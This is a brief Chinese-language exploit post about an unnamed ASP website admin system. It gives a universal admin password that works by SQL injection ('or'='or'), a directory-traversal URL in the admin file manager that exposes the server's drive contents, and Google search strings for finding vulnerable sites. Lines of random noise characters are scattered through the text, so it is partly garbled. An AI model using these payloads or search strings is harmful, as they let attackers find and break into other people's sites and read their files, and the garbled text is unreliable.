后台万能密码 'or'='or'
! H% [% D1 M# {* i7 s7 h- U6 l
/ s1 ?2 F: C9 [) I9 ^- i后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!7 z. M9 E4 \4 p
admin/uploadfile.asp?currentFolder=/upfiles/../
8 h h. [/ u- x! P3 [+ D1 v7 Q, e% I! }: C9 x7 ]
漏洞证明:' E7 c- W; P$ y& j% E" r+ m
- y2 C" T) i2 o+ K9 F2 V* ]
谷歌:inurl:type.asp?id=1 新闻中心
5 G- e) N. e }" ?或者 :inurl:download_ok.asp?( s& `9 s* \! Q# ^; Y
" d; B: \3 U. I/ r0 S- M
|